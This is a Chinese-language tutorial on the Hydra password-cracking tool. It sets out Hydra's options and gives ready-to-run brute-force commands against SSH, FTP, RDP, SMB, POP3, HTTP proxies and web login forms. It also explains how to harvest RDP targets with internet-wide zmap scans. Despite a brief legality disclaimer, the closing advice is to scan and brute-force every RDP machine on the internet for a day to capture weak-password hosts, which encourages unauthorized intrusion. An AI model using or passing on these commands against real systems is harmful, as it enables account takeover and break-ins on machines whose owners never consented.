Hydra是著名黑客组织thc的一款开源的暴力破解密码的工具,可以对多种服务的账号和密码进行爆破,包括web登录、数据库、SSH、FTP、RDP等服务,支持linux、windows、mac平台安装,其中kali linux自带hydra。Hydra 是一个密码破解工具。它可以在多个网络服务器之间分布式地运行,以提高破解密码的效率。Hydra 通常用来破解网络系统的用户名和密码,以便访问这些系统。但是,请注意,使用 Hydra 或任何其他密码破解工具来破解未授权的网络系统是非法的,并可能会导致法律问题。
kali官方镜像文件自带hydra,如果用得kali源地址,则需要另外安装
登录到kali SSH终端。以Root用户安装:su root
安装hydra:
apt-get install hydra安装完成,输入hydra出现参考,已安装完成
用法注意字母大小写
-l #指定单个用户名
-L #指多个用户名,放在文件里,一行一用户
-p #指定单个密码
-P #指多个密码,放在文件里,一行一密码,称为密码字典
-s #指定端口,FTP默认端口21,SSH默认22,win系统服务器登陆默认3389
-vV #显示详细的执行过程
-e <n/s> # -en 空密码试探,-es指定用户密码试探
-t #爆破线程数,如不使用该参数,默认16线程
-w #最大超时时间,单位秒,参数默认30m
-M #批量对目标IP进行爆破,放在文件里,一行一个IP
-f #成功一个后,立即停止爆破
-o #将爆破成功的用户密码,保存到文件
示例:
爆破SSH:
hydra -l root -P /yozz/字典.txt -vV -s 22 -o /yozz/成功.txt 188.8.8.1 ssh意思:以单root用户,加上密码字典,对默认22 ssh端口,进行爆破。后面加上目标IP 用ssh 模式
爆破FTP:
hydra -L /yozz/用户.txt -P /yozz/字典.txt -vV -s 21 -o /yozz/成功.txt 188.8.81 ftp意思:以多个用户,文件内容一行一用户,对默认21 ftp端口进行爆破,目标IP+模式
成功,可以看到,目标IP,222端口ftp模式,用户ftpuser+密码1433223
爆破3389 windows服务器
爆破windows服务器,登录默认3389端口:
默认用户administrator:
hydra -l administrator -P /yozz/字典.txt -M /yozz/3389机.txt -vV -en -s 3389 -o /yozz/成功.txt rdp意思:-M 对多个靶机进行爆破,批量爆破,文件内容一行一个IP
弱口令字典下载
zip格式,解压出来用/pass.txt
如何批量提取3389靶机IP,使用zmap工具
对全网IP,或IP段扫描包含指定端口IP,批量提取扫描
zmap参考:https://www.nstns.com/zmap.html
爆破smb
hydra -l administrator -P /yozz/字典.txt 188.8.8.1 smb
爆破POP3邮箱
hydra -L /yozz/用户.txt -P /yozz/字典.txt my.pop3.mail pop3用户字典,一行一用户比如;Y[email protected]
后面加上+邮箱服务器地址
- 邮箱类型:imap,smtp,pop3
爆破http-proxy
hydra -l admin -P /yozz/字典.txt http-proxy://192.168.0.1
爆破web表单
hydra -l 用户名 -P /yozz/字典.txt-s 80 域名 http-post-form"/admin/login.php:username=^USER^&password=^PASS^:<密码错误时报错>"意思:username是form表单的账号name;password是密码字段的name;USER和PASS是固定的,代表账号和密码。冒号后面紧跟着登录失败的时的提示信息,用来判别爆破是否成功;http-post-form代表是以post方式提交数据,如果是GET方式直接将post修改为get即可;/admin/login代表表单提交的地址使用的绝对路径
另外还有一款medusa(美杜莎)爆破工具
medusa参考:https://www.nstns.com/medusa.html
爆破关键看字典,只要字典够强大,爆破成功也就是时间+运气了
建议爆破3389机,对全网络3389机扫描爆破,挂服务器上跑个一天
一天下来,好得话,能搞几台弱口令机
1 条评论
牛逼